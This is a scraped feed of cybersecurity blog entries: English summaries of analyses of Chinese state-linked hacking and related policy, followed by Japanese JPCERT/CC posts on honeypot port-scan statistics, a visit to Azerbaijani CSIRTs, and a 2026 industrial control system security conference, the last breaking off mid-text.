class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Source: ChatGPT image</figcaption></figure></div>On August 27, 2025, the United States and 22 government agencies from 13 countries issued a <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Cybersecurity Advisory</a> entitled, “Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed Global Espionage System.” The advisory outlined the tactics, techniques, and procedures (TTPs) employed by advanced persistent threat (APT) actors whose activity partially overlaps with activity grouped under names such as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor.The document identified three Chinese companies—Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司), Beijing Huanyu Tianqiong Information Technology Co., Ltd. (北京寰宇天穹信息技术有限公司), and Sichuan Zhixin Ruijie Network Technology Co., Ltd. (四川智信锐捷网络科技有限公司)—that have supported these APT activities globally since at least 2021. These organizations reportedly supplied cyber-related products and services to China’s intelligence entities, including units within the People’s Liberat… <a href="https://www.nattothoughts.com/p/salt-typhoon-new-joint-advisory-offers"> Read more </a>
No Ranges, No Bounties, No Contests: Forging Offensive Capabilities in China’s 2000s Hacker Scene

Wed, 27 Aug 2025 16:03:08 -0000

China’s early hacking training grounds weren’t classrooms or hacking contests, but online forums, real-world targets, and freely shared offensive tools and vulnerabilities.

<pre><code>This post is adapted from the Cyberdefense Report <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/before-vegas-cyberdefense-report.pdf">"Before Vegas: The ‘Red Hackers’ Who Shaped China’s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</code></pre>In our <a href="https://nattothoughts.substack.com/p/few-and-far-between-during-chinas">last piece</a>, we showed how truly elite offensive cyber talent has always been scarce, even within China’s massive hacker communities of the 2000s. But how did this small circle of talent actually develop offensive capabilities? In China, these fall under the broader category of “live-fire” capabilities (实战能力),<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> i.e. the ability to apply tools and techniques such as penetration testing, security operations, and incident response. As we discussed <a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking">here</a>, <a href="https://nattothoughts.substack.com/p/business-priorities-of-chinese-cyber">here</a>, and <a href="https://nattothoughts.substack.com/p/butian-vulnerability-platform-forging">here</a>, hacking contests, bug bounty platforms, and cyber ranges have become core pillars of China’s modern live-fire talent pipeline. Today, these mechanisms are deeply institutionalized across universities, companies, and state-backed initiatives, serving as the backbone for identifying and training skilled operators. <a href="https://www.nattothoughts.com/p/no-ranges-no-bounties-no-contests"> Read more </a>
Few and Far Between: During China’s Red Hacker Era, Patriotic Hacktivism Was Widespread—Talent Was Not

Wed, 13 Aug 2025 16:02:26 -0000

Inside the small, elite circles that powered China’s massive hacker communities in the late 1990s and 2000s.

<pre><code>This post is excerpted from the Cyberdefense Report <a href="https://css.ethz.ch/en/center/CSS-news/2025/07/before-vegas-the-red-hackers-who-shaped-chinas-cyber-ecosystem.html">"Before Vegas: The ‘Red Hackers’ Who Shaped China’s Cyber Ecosystem,"</a> published in July 2025 by the Center for Security Studies (CSS) at ETH Zurich, Switzerland.</code></pre>Truly elite offensive cyber talent has always been rare. Despite the growth of cybersecurity communities worldwide, and the emergence of extensive and structured talent pipelines in countries like China – examined in Natto pieces<a href="https://nattothoughts.substack.com/p/the-matrix-cup-cultivating-top-hacking"> 1</a>,<a href="https://nattothoughts.substack.com/p/when-a-vocational-college-becomes"> 2</a> and<a href="https://nattothoughts.substack.com/p/debating-chinas-ai-path-alternative"> 3</a> – which have made high-quality talent more widely available, truly exceptional individuals remain scarce and highly sought after.As early as 2013, the<a href="https://www.airuniversity.af.edu/CASI/Display/Article/2485204/plas-science-of-military-strategy-2013/"> Science of Military Strategy</a>—a foundational text published by the PLA Academy of Military Science—noted that while cyber warfare benefits from a “broad mass base,” the traditional Chinese military ideal of “all people are soldiers” does not translate to cyberspace. Instead, it emphasized that only an “<a href="https://www.bloomsburycollections.com/monograph-detail?docid=b-9798881817602&pdfid=9798881817602.ch-8.pdf&tocid=b-9798881817602-chapter8">extremely lean</a>” cohort possessed the capabilities required for high-level cyber operations.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a>… <a href="https://www.nattothoughts.com/p/few-and-far-between-during-chinas"> Read more </a>
When Privileged Access Falls into the Wrong Hands: Chinese Companies in Microsoft’s MAPP Program

Thu, 31 Jul 2025 16:32:47 -0000

Chinese companies face conflicting pressures between MAPP’s non-disclosure requirements and domestic policies that incentivize or mandate vulnerability disclosure to the state.

On July 25, 2025, Bloomberg <a href="https://www.bloomberg.com/news/articles/2025-07-25/microsoft-sharepoint-hack-probe-on-whether-chinese-hackers-found-flaw-via-alert?srnd=undefined">reported </a>that Microsoft is investigating whether a leak from its Microsoft Active Protections Program (MAPP) allowed Chinese hackers to exploit a SharePoint vulnerability before a patch was released. Microsoft attributed the campaign – dubbed “ToolShell” after the custom remote access trojan used – to three China-linked threat actors: Linen Typhoon, Violet Typhoon, and Storm-2603. The attackers reportedly compromised over 400 organizations worldwide, including the U.S. National Nuclear Security Administration.Launched in 2008, MAPP is designed to reduce the time between the discovery of a vulnerability and the deployment of patches. By giving trusted security vendors early access to technical details about upcoming patches, Microsoft enables them to release protections (such as antivirus signatures and intrusion detection rules) in sync with its monthly updates. The program, however, relies on strict compliance with non-disclosure agreements and the secure … <a href="https://www.nattothoughts.com/p/when-privileged-access-falls-into"> Read more </a>
HAFNIUM-Linked Hacker Xu Zewei: Riding the Tides of China’s Cyber Ecosystem

Wed, 23 Jul 2025 16:01:48 -0000

How one man’s career reveals the interconnected web of China’s state security apparatus, cybersecurity firms, and strategic industries

On July 3, 2025, at Milan Malpensa Airport, <a href="https://www.ansa.it/english/newswire/english_service/2025/07/07/ansachinese-spy-arrested-in-italy-on-us-warrant_9f5bbfe6-74ef-4f78-bb1e-fcf01f755652.html">Italian police arrested</a> Xu Zewei (徐泽伟), whom U.S. authorities allege to be a hacker contracted by the Chinese state. Following the news about Xu’s arrest from Italian media, on July 8, the U.S. Department of Justice (US DoJ) issued a <a href="https://www.justice.gov/opa/pr/justice-department-announces-arrest-prolific-chinese-state-sponsored-contract-hacker">press release</a> and unsealed an <a href="https://www.justice.gov/opa/media/1407196/dl">indictment</a>, accusing Xu Zewei and his co-defendant Zhang Yu (张宇) of participating in hacking activities between February 2020 and June 2021. These activities were reportedly linked to the Advanced Persistent Threat (APT) group <a href="https://attack.mitre.org/groups/G0125/">HAFNIUM</a> (also known as Silk Typhoon or APT27), involving the theft of COVID-19 research from universities, exploitation of Microsoft Exchange Server vulnerabilities, and compromising thousands of computers worldwide, including those in the United States. As of this writing, Xu remains in custody near Milan and is undergoing extradition proceedings to the United States. During his initial court appearance, <a href="https://www.cnn.com/2025/07/08/politics/us-extradition-chinese-man-accused-hacking-covid-research">Xu asserted</a> that he “has nothing to do with the case,” … <a href="https://www.nattothoughts.com/p/hafnium-linked-hacker-xu-zewei-riding"> Read more </a>
Pick Your Innovation Path in AI: Chinese Edition

Wed, 09 Jul 2025 16:01:31 -0000

China’s advances in AI show the effects of a state approach of “introduce, digest, absorb, re-innovate” and years of debate on the balance between market-driven innovation and state-led development

When the Chinese start-up <a href="https://api-docs.deepseek.com/news/news1210">DeepSeek launched</a> its artificial intelligence (AI) chatbot in December 2024, many Americans suddenly realized that <a href="https://www.nytimes.com/2025/05/19/opinion/china-us-trade-tariffs.html">China could compete in AI.</a> News of this breakthrough sparked debate on whether <a href="https://www.wired.com/story/stanford-study-global-artificial-intelligence-index/">China could win the AI race</a> and <a href="https://www.economist.com/china/2025/05/25/xi-jinpings-plan-to-overtake-america-in-ai">surpass the dominance</a> of the United States in AI and on <a href="https://www.foreignaffairs.com/united-states/what-if-china-wins-ai-race">the implications if China were to succeed.</a> In April 2025, Chinese President Xi Jinping delivered <a href="https://cset.georgetown.edu/publication/xi-politburo-collective-study-ai-2025/">remarks</a> on artificial intelligence during a Politburo study session on AI, Xi’s first pronouncement on the subject since 2018. “Persist in Being Self-Reliant, Be Strongly Oriented Toward Applications, and Push the Orderly Development of Artificial Intelligence,” was Xi’s main message, according to a Chinese state media summary of his speech. <a href="https://digichina.substack.com/p/xis-ai-message-to-the-politburo-analyzed">Experts suggested</a> that Xi’s comments signaled China’s determination to achieve AI supremacy. China has come a long way since the release of the State Council’s <a href="https://www.newamerica.org/cybersecurity-initiative/digichina/blog/full-translation-chinas-new-generation-artificial-intelligence-development-plan-2017/">New Generation Artificial Intelligence Development Plan</a> in 2017. Back then, Chinese schola… <a href="https://www.nattothoughts.com/p/debating-chinas-ai-path-alternative"> Read more </a>
TSUBAMEレポート Overflow（2025年7～9月）

Mon, 30 Mar 2026 05:00:00 -0000

はじめにこのブログ「TSUBAMEレポート Overflow」では、四半期ごと...

<h3>はじめに</h3> このブログ「TSUBAMEレポート Overflow」では、四半期ごとに公表している「インターネット定点観測レポート」の公開にあわせて、レポートには記述していない海外に設置しているセンサーの観測動向の比較や、その他の活動などをまとめて取り上げていきます。今回は、TSUBAME（インターネット定点観測システム）における2025年7～9月の観測結果についてご紹介します。 <h3>国内のNVR製品等、複数の機器が決まったポート番号で待ち受けているIPアドレスからの不審なパケットについて</h3> 「インターネット定点観測レポート」では「マルウェアに感染したとみられるTP-Link製ルーターからのパケットの観測結果について」として、国内を送信元とするノードのうち、TP-Link製ルーターに関する事例を紹介しました。しかしながら、ハニーポットではそれ以外の製品から送信されたパケットについても観測されています。送信元IPアドレスによっては、複数のポートがオープンとなっているケースも確認されています。このような場合、そのIPアドレスに設置されているルーターによってポートフォワーディングが設定され、複数の製品が単一のIPアドレス上で同居して動作していると考えられます。このような構成自体は珍しいものではありませんが、外部からの観測だけでは、どの製品が侵害を受けているのかを判別することは困難です。今回は、このように複数の製品が組み合わさって稼働しているIPアドレスの中で、特に気になる事象が確認されましたので紹介します。個々のIPアドレスで観測された特徴を箇条書きでまとめると、次のとおりです。 <ul> <li>NVR製品のログイン画面が確認できる</li> <li>国内メーカー製の業務用ルーターの管理画面が確認できる</li> <li>SDNコントローラーのログイン画面が確認できる</li> </ul> 今回の事象の大きな特徴として、これらの製品それぞれのWeb UIが、異なるIPアドレスであっても同じポート番号で待ち受けている点が挙げられます。また、国内メーカー製ルーターの管理画面には、都道府県名と推測される略称の文字列が記載されており、複数の地域で稼働している可能性が示唆されました。これらの点から、システム部門、あるいは導入を担当したSI／NIerが、同一設定でキッティングを行った可能性が考えられます。不審なパケットが観測されていることから、いずれかの機器が侵害を受けている可能性が高いと考えられます。現在、これらの機器を設置しているユーザーへのコンタクトを試みていますが、現時点では成功していません。本記事をご覧になり、心当たりのある方がいらっしゃいましたら、当方までご連絡いただければ幸いです。 <h3>国内外の観測動向の比較</h3> 図1は、国内外のセンサー1台が1日あたりに受信したパケット数の平均を月ごとに比較したものです。国内のセンサーよりも海外のセンサーで多くのパケットを観測しています。また、国内のセンサーは月を追うごとに徐々に観測数が減少していますが、海外のセンサーについては8月に減少したものの、9月は増加に転じました。 <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/of_fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/of_fig1.png" width="1155" height="573" alt="" class="asset asset-image at-xid-3981298" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">図1：月ごとの国内外センサー平均パケット数の比較</td> </tr> </tbody> </table> <h3>センサーごとの観測動向の比較</h3> 各センサーには、それぞれグローバルIPアドレスが1つ割り当てられています。国内、北米、欧州、それ以外の地域の各センサーで観測状況に違いがあるかを見るために、表1に届いたパケットTOP10をまとめました。センサーごとに順位に違いはありますが、22/TCP、23/TCP、80/TCP、443/TCP、8080/TCP等はほぼすべてのセンサーで観測していました。これらは広範囲のネットワークにてスキャンが行われていることを示唆していると考えられます。 表1：国内外センサーごとのパケットTOP10の比較 <table> <thead> <tr> <th></th> <th>国内センサー1</th> <th>国内センサー2</th> <th>北米センサー1</th> <th>北米センサー2</th> <th>欧州センサー1</th> <th>欧州センサー2</th> <th>それ以外の地域のセンサー1</th> <th>それ以外の地域のセンサー2</th> </tr> </thead> <tbody> <tr> <td>1番目</td><td>23/TCP</td><td>23/TCP</td><td>80/TCP</td><td>23/TCP</td><td>23/TCP</td><td>ICMP</td><td>ICMP</td><td>22/TCP</td> </tr> <tr> <td>2番目</td><td>80/TCP</td><td>80/TCP</td><td>ICMP</td><td>22/TCP</td><td>443/TCP</td><td>443/TCP</td><td>23/TCP</td><td>23/TCP</td> </tr> <tr> <td>3番目</td><td>3389/TCP</td><td>443/TCP</td><td>443/TCP</td><td>3389/TCP</td><td>443/TCP</td><td>80/TCP</td><td>22/TCP</td><td>ICMP</td> </tr> <tr> <td>4番目</td><td>22/TFCP</td><td>8080/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td> </tr> <tr> <td>5番目</td><td>ICMP</td><td>8888/TCP</td><td>22/TCP</td><td>443/TCP</td><td>22/TCP</td><td>22/TCP</td><td>443/TCP</td><td>443/TCP</td> </tr> <tr> <td>6番目</td><td>8080/TCP</td><td>22/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td> </tr> <tr> <td>7番目</td><td>443/TCP</td><td>3389/TCP</td><td>3389/TCP</td><td>8080/TCP</td><td>3389/TCP</td><td>3389/TCP</td><td>3389/TCP</td><td>3389/TCP</td> </tr> <tr> <td>8番目</td><td>5555/TCP</td><td>ICMP</td><td>8080/TCP</td><td>ICMP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td> </tr> <tr> <td>9番目</td><td>34567/TCP</td><td>8728/TCP</td><td>8443/TCP</td><td>445/TCP</td><td>8443/TCP</td><td>8443/TCP</td><td>6379/TCP</td><td>8443/TCP</td> </tr> <tr> <td>10番目</td><td>60000/TCP</td><td>5555/TCP</td><td>6379/TCP</td><td>8081/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>2222/TCP</td><td>2222/TCP</td> </tr> </tbody> </table> <h3>おわりに </h3> 複数の地点で観測を行うことで、特定のネットワークだけで変動が起きているのかどうかを判断できるようになります。本四半期は、特別な号外による注意喚起等の情報発信には至っていませんが、スキャナーの存在には注意が必要です。今後もレポート公開にあわせて定期的なブログの発行を予定しています。特異な変化などがあった際は号外も出したいと思います。皆さまからのご意見、ご感想も募集しております。掘り下げて欲しい項目や、紹介して欲しい内容などがございましたら、お問い合わせフォームよりお送りください。最後までお読みいただきありがとうございました。 サイバーメトリクスグループ鹿野恵祐 TSUBAMEレポート Overflow（2025年7～9月）
世界のCSIRTから～アゼルバイジャン～

Wed, 25 Mar 2026 06:00:00 -0000

世界のCSIRTから vol.6 こんにちは、国際部の米澤です。３月初旬にアゼル...

<h3>世界のCSIRTから vol.6</h3> こんにちは、国際部の米澤です。３月初旬にアゼルバイジャンの首都バクーに出張し、CSIRT組織や人材育成施設など５つの関連組織を訪問する機会がありました。本記事では、その訪問の概要についてご紹介します。 <h3>火の国アゼルバイジャンと風の街バクー</h3> <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093016 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ01-320wri.jpg" alt="" width="450" height="338"><figcaption>バクー市街地とカスピ海</figcaption> </figure> アゼルバイジャンは、カスピ海と黒海の間に広がるコーカサス地方に位置しています。天然ガスや石油などの豊富な資源を有し、地中から噴き出す天然ガスが燃え続けるヤナルダグという山があることから、「火の国」とも呼ばれています。 その首都であるバクーはカスピ海に面しており、中世の面影が残る旧市街の街並みと、経済発展を感じさせる近未来的な建物が共存する印象的な街でした。バクーはペルシア語で「風の街」を意味すると言われており、その名のとおり、カスピ海から吹き付ける強い風を実際に感じることができました。 <h3>アゼルバイジャンのCSIRT組織</h3> アゼルバイジャンでは、政府、国内インターネット、研究教育ネットワークといったセクターごとにCSIRTが設置され、それぞれの役割に応じたサイバーセキュリティ対応が行われています。具体的には、CERT.AZ<a href="#01">[1]</a>、CERT.GOV.AZ<a href="#02">[2]</a>、AzScienceCERT<a href="#03">[3]</a>の3つのCSIRT組織が存在します。これらの組織は、セキュリティ対策の普及啓発やインシデント対応を通じて、国内のサイバーセキュリティ体制の強化に取り組んでいます。 FIRST加盟組織であるCERT.AZ とCERT.GOV.AZとは、これまでも国際カンファレンスやワークショップなどで連携する機会がありましたが、AzScienceCERT との交流は今回が初めてでした。以下では、各CSIRTの組織概要について簡単に紹介します。 <h4>CERT.AZ</h4> <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093033 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ02-640wri.jpg" alt="" width="450" height="338"><figcaption>CERT.AZの皆さんと記念撮影</figcaption> </figure> CERT.AZは、2012年に設立されたCSIRTで、ICT政策、デジタル政府、通信インフラ、運輸インフラを所管するデジタル発展・運輸省（Ministry of Digital Development and Transport）傘下の電子セキュリティサービス（Electronic Security Service）が運営しています。 主に国内の情報インフラ関係者との連携や活動の調整を行うとともに、民間組織や一般ユーザーを対象としたインシデント対応支援、脅威情報の収集・分析、セキュリティ対策の普及啓発などに取り組んでいます。サイバー脅威への対応では、国内だけでなく国境を超えるサイバー脅威に対処するため情報共有活動を重視しており、日本を含む国際的なパートナーとも今後さらに情報共有を強化していきたいとの話がありました。 また、セキュリティ意識の向上を目的とした普及・啓発活動に積極的に取り組んでおり、テレビCMやPodcastを通じた情報発信のほか、アゼルバイジャンのデジタルIDアプリである「myGov」のプラットフォーム上でも注意喚起のメッセージを発信しているとの説明がありました。 CERT.AZとは、2025年8月にオンラインでワークショップを実施し、相互の活動や状況を共有していましたが、実際に現地を訪れることで、より緊急時の対応をスムーズにできると感じました。また、JPCERT/CCが主催するカンファレンスJSACにも参加いただいており、さまざまな場面で交流を行っています。 <h4>CERT.GOV.AZ</h4> <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093037" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ03-640wri.jpg" alt="" width="450" height="338"><figcaption>SCISSSおよびCERT.GOV.AZの皆さんと記念撮影</figcaption> </figure> CERT.GOV.AZは、国家安全保障機関の一つである特別通信・情報セキュリティ国家サービス（SCISSS：State Service for Special Communication and Information Security）傘下に設置された政府向けCSIRTです。2008年に設立されました。 主に政府機関のネットワークを対象として、サイバー攻撃の検知や予防措置、政府ネットワークのセキュリティ監視、インシデント対応支援などを行っています。24時間365日体制のセキュリティオペレーションセンター（SOC）を運用しているほか、デジタルフォレンジックやマルウェア分析を専門に行うチームも設置されています。また、サイバーセキュリティ意識の向上を目的として、公式サイトとは別に脅威情報の発信を専門に行うWebサイトを運営し、脅威分析レポートや独自に開発したマルウェア分析ツールを公開しています。 インシデント調査の中で国外に影響が及ぶ可能性のある事案については、海外の連携先へ通知しており、今後も脅威情報の共有などを通じて相互に協力していくことを確認しました。 <h4>AzScienceCERT</h4> <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093040" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ04-640wri.jpg" alt="" width="450" height="338"><figcaption>情報技術研究所およびAzScienceCERTの皆さんと記念撮影</figcaption> </figure> AzScienceCERTは、アゼルバイジャン国立科学アカデミー（ANAS：Azerbaijan National Academy of Sciences）の情報技術研究所（Institute of Information Technology）のもとで活動するCSIRTです。2011年に設立されました。研究・教育ネットワークであるAzScienceNetを利用する大学や研究機関、教育機関を対象として、情報セキュリティリスク管理やインシデント対応支援などを行っています。 情報技術研究所には、AzScienceNetのデータセンター、情報技術やサイバーセキュリティの研究を行うリサーチセンター、ネットワーク運用・監視を行うオペレーションセンターなどが設置されています。研究機関であることから、ソフトウェアエンジニアリングやデジタルフォレンジックなどに関する科学的・実践的課題をテーマとした研究や会議を行っているとのことで、こうした分野における国際交流に関心を持っているとの話がありました。 <h3>人材育成や民間組織の能力向上を支援する組織</h3> アゼルバイジャンでは、CSIRT組織以外にも、サイバーセキュリティ人材育成や民間組織の能力向上を支援する活動が活発に行われています。今回の訪問では、以下の２つの関連組織を訪問しました。 <h4>Azerbaijan Cybersecurity Center</h4> <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093042" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ05-640wri.jpg" alt="" width="450" height="338"><figcaption>施設見学の様子</figcaption> </figure> 同センター<a href="#04">[4]</a>は、アゼルバイジャン国内におけるサイバーセキュリティ人材の育成を目的とした国家規模の教育・訓練拠点です。デジタル発展・運輸省とイノベーションデジタル開発庁が主導して、2023年に設立されました。また、Technion（イスラエル工科大学）が国際教育パートナーとなり、トレーニングカリキュラムや講師派遣などの支援を行っているとのことでした。 同センターのトレーニングプログラムの特徴は、大学のアカデミックな教育とは異なり、より実践的な能力構築を半年や1年の長期間で行う点です。例えば、実際のサイバー攻撃と防御のシナリオを想定した実践的なトレーニングが行われています。 トレーニングに参加するためには、選考試験を通過する必要があり、応募条件として17歳以上であること（年齢上限なし）、上級レベルの英語力と基礎的なITスキルを有することが求められます。60名の定員に対して約2000名の応募があるそうで、競争率は非常に高いとのことでした。提携の大学に所属している学生であれば、同センターでの活動が卒業に必要な単位として認められるのも人気の秘訣です。 これまでに同センターのトレーニングプログラムを修了した受講生は480名で、そのうち86%がサイバーセキュリティ業界に就職しているとのことです。企業とのインターンシッププログラムや卒業生との交流イベントなど、キャリアにつながる機会が多いことも、この高い就職率の理由の一つとの説明がありました。訪問時には施設を案内していただき、意欲にあふれた受講生の皆さんとも交流することができました。 アゼルバイジャンではこのような人材育成の取り組みに加え、民間企業や専門家のネットワーク形成を通じてサイバーセキュリティ分野の発展を支える活動も行われています。 <h4>Association of Cybersecurity Organizations of Azerbaijan（AKTA）</h4> <figure class="mt-figure mt-figure-center"> <img class="asset asset-image at-xid-4093051" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/AZ06-640wri.jpg" alt="" width="450" height="338"><figcaption>AKTAの皆さんとの会議の様子</figcaption> </figure> 同協会<a href="#05">[5]</a>は、2022年に設立された、アゼルバイジャン国内のサイバーセキュリティ関連企業・組織・専門家を束ねる非営利の民間団体です。国内のサイバーセキュリティ分野における企業や専門家を結び付けるプラットフォームとしての役割を担い、サイバーセキュリティ環境の強化、人材育成・教育・啓発、政府と民間の連携促進、情報共有や共同活動の推進などを通じて、アゼルバイジャンにおけるサイバーセキュリティ対応能力の強化とエコシステム形成を目的として活動しています。 現在、約60社の企業メンバーが参加しており、サイバーセキュリティ企業やIT関連企業、通信事業者、教育機関が含まれているとのことでした。昨今の課題としては、重要インフラ分野でのセキュリティ対策が進んでいる一方で、中小企業における対策が十分に進んでいない点が挙げられていました。そうした課題に対応していく上でも、このような民間団体の活動が重要な役割を果たしているようです。 また、トルコ、カザフスタン、ウズベキスタンなどの企業や専門家との交流を通じて、教育や産業分野における国際的なネットワーク構築にも力を入れています。同協会はNational Cybersecurity Forumという国際イベントを主催しており、重要インフラ保護、国際協力、能力構築、サイバー外交などのテーマについて講演や議論が行われているとのことでした。日本からのスピーカーの参加についてもぜひ検討して欲しいとの話がありました。 <h3>おわりに</h3> アゼルバイジャンでは、デジタル化の進展に伴い、国家レベルでサイバーセキュリティ体制の強化が進められています。2023年には「情報セキュリティおよびサイバーセキュリティ戦略（2023-2027）」が策定され、重要情報インフラの保護、サイバー脅威への対応能力の強化、人材育成、国際協力の推進などが重点分野として掲げられています。今回の訪問を通じて、政府機関や民間企業、研究機関がそれぞれの役割を担いながら相互に協力し、国全体としてサイバーセキュリティ能力の向上に取り組んでいることが分かりました。 また、現地で出会った関係者の皆さんは、サイバーセキュリティ分野における取り組みや国際協力をさらに強化していこうとする前向きなエネルギーに満ちており、それは発展を続けるバクーの街の雰囲気とも重なり、私たちにとっても大きな刺激となりました。今後もこうした交流を通じて、各国のCSIRTとの連携を深めながら、国境を超えるインシデントや脅威への対応を中心に、情報共有の取り組みや協力関係を広げていきたいと思います。 国際部米澤詩歩乃 <h2>参考情報</h2> <a name="01">[1]</a> CERT.AZ <a href="https://cert.az/">https://cert.az/</a> <a name="02">[2]</a> CERT.GOV.AZ <a href="https://cert.gov.az/">https://cert.gov.az/</a> <a name="03">[3]</a> AzScienceCERT <a href="https://azsciencenet.az/az/service/3">https://azsciencenet.az/az/service/3</a> <a name="04">[4]</a> Azerbaijan Cybersecurity Center <a href="https://www.akm.az/">https://www.akm.az/</a> <a name="05">[5]</a> Association of Cybersecurity Organization of Azerbaijan <a href="https://akta.az/en">https://akta.az/en</a>
制御システムセキュリティカンファレンス2026 開催レポート

Tue, 24 Mar 2026 02:00:00 -0000

JPCERT/CCは、2026年2月10日に制御システムセキュリティカンファレン...

JPCERT/CCは、2026年2月10日に<a href="https://www.jpcert.or.jp/event/ics-conference2026.html" target="_blank" rel="noopener">制御システムセキュリティカンファレンス2026</a>を開催いたしました。本カンファレンスは、国内外の制御システムにおける脅威の現状や制御システムセキュリティのステークホルダーによる取り組みを共有し、参加者の制御システムセキュリティ対策の向上やベストプラクティス確立の一助となることを目的に開催しています。2009年以来、毎年開催し、今年で18回目を迎えました。 今回は会場のみで実施し、137名（参加申込数216名）の方々に参加いただきました。JPCERT/CC Eyesでは、開会・閉会のごあいさつおよび6つの講演について紹介いたします。なお、パネルセッション以外の講演はYouTubeで配信しています。文中にリンクを張っていますのであわせてご覧ください。 <h3>開会ごあいさつ</h3> 経済産業省商務情報政策局サイバーセキュリティ課企画官　橋本勝国氏 <a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_00_MINISTRY_OF_ECONOMY_TRADE_AND_INDUSTRY.pdf" target="_blank" rel="noopener">講演資料</a> <a href="https://www.youtube.com/watch?v=7-SuRR2fqVo" target="_blank" rel="noopener">YouTube</a> 経済産業省商務情報政策局サイバーセキュリティ課企画官橋本氏から開会のごあいさつをいただきました。 橋本氏からは、IPA「情報セキュリティ10大脅威2026」等を踏まえ、ランサムウェア攻撃が依然として大きな脅威であり、特に製造業を中心に被害が拡大している現状が示されました。 あわせて、サプライチェーン全体での対策の底上げを図るSCS評価制度の構築や、半導体デバイス工場におけるOTセキュリティガイドラインの策定、JC-STARの開始と政府調達要件化の動き、SBOM国際共同ガイダンスへの署名など、わが国の政策の最新動向が紹介されました。 さらに、サイバー対処能力強化法の成立を踏まえ、官民が連携した能動的サイバー防御体制の整備を進め、産業基盤と国民生活を守り抜く必要性を強調し、社会全体で実効性ある取り組みを着実に推進していくことが重要であると締めくくりました。 <img class="asset asset-image at-xid-4071768" style="display: block;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/ICSSConf2026_opening-640wri.png" alt="" width="640" height="360"> <h3>制御システムセキュリティの現在と展望～この1年間を振り返って～</h3> 講演者： 一般社団法人JPCERTコーディネーションセンター技術顧問宮地利雄 <a href="https://www.jpcert.or.jp/present/2026/ICSSConf2026_01_JPCERTCC.pdf" target="_blank" rel="noopener">講演資料</a> <a href="https://www.youtube.com/watch?v=0lWBEkx8xPY" target="_blank" rel="noopener">YouTube</a> 本講演では、2025年の制御システム（ICS）セキュリティに関する状況を振り返り、主な動向や変化について解説しました。冒頭では、Stuxnet発見から15年、ウクライナ停電から10年が経過した節目にあたることを指摘し、ICSとITの連携が一層進む中で、地政学的緊張の高まりがサイバー空間にも影響を及ぼしている概況を俯瞰しました。 